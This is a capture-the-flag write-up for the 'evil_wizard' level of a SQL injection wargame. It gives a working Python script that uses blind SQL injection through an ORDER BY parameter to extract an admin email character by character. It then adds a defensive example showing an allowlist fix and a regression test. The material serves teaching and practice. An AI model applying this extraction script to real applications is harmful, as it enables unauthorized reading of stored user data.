evil_wizard

This is the first screen.

I solved it with Blind SQL Injection.

The Python code is shown below.

import requests

URL = 'https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = 'score</th><tr><td>rubiya'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# Result: the email length is 30
def find_email_length():
    email_len = 1
    while query("if(id='admin' and length(email)={}, id='admin', id='rubiya')".format(email_len)) is False:
        email_len += 1
    print('email_len: {}'.format(email_len))
    return email_len


# Result: aasup3r_secure_email@emai1.com
def find_email():
    email_len = find_email_length()
    email = ''
    for pos in range(1, email_len + 1):
        for character in range(0, 128):
            if query("if(id='admin' and ord(substr(email,{},1))={}, id='admin', id='rubiya')".format(pos, character)) is True:
                email += chr(character)
                break
    print('email: {}'.format(email))


find_email()

Running it shows that the email is aasup3r_secure_email@emai1.com.

Visiting https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?email=aasup3r_secure_email@emai1.com solves the challenge.
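The script works because row order acts as a true/false signal. As an added example (not from the original post or the challenge's code), here is the concatenating form next to an allowlist fix, with a regression check that sort order no longer depends on a hidden column. It assumes the `order` value is placed into an ORDER BY clause, as the parameter name and payload suggest; the SQLite table, function names and sample rows are constructed for illustration.

```python
import sqlite3

# Constructed rows for illustration; not the challenge's real data.
ROWS = [("rubiya", "rubiya@example.test", 100),
        ("admin", "secret@example.test", 50)]

# Request value -> fixed column name. Anything else is rejected.
ALLOWED_ORDER = {"id": "id", "score": "score"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prob (id TEXT, email TEXT, score INTEGER)")
    db.executemany("INSERT INTO prob VALUES (?, ?, ?)", ROWS)
    return db


def list_vulnerable(db, order):
    # 'Before': the request value is concatenated into ORDER BY as SQL.
    sql = "SELECT id, score FROM prob ORDER BY " + order
    return [row[0] for row in db.execute(sql)]


def list_hardened(db, order):
    # 'After': only a column name taken from the allowlist reaches the query.
    column = ALLOWED_ORDER.get(order)
    if column is None:
        raise ValueError("unsupported sort key")
    sql = "SELECT id, score FROM prob ORDER BY " + column
    return [row[0] for row in db.execute(sql)]


def order_is_oracle(lister):
    # Regression check: does row order change with a condition on the
    # email column, which is never selected? 19 is the constructed admin
    # email's length, 18 is not.
    probe = "(id='admin' AND length(email)={}) DESC, score DESC"
    db = make_db()
    try:
        return lister(db, probe.format(19)) != lister(db, probe.format(18))
    except ValueError:
        return False  # expression rejected before reaching the database


if __name__ == "__main__":
    print("vulnerable leaks:", order_is_oracle(list_vulnerable))
    print("hardened leaks:", order_is_oracle(list_hardened))
```

A bound parameter cannot stand in for a column name in ORDER BY, which is why the fix maps the request value to a fixed identifier instead of using a placeholder.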
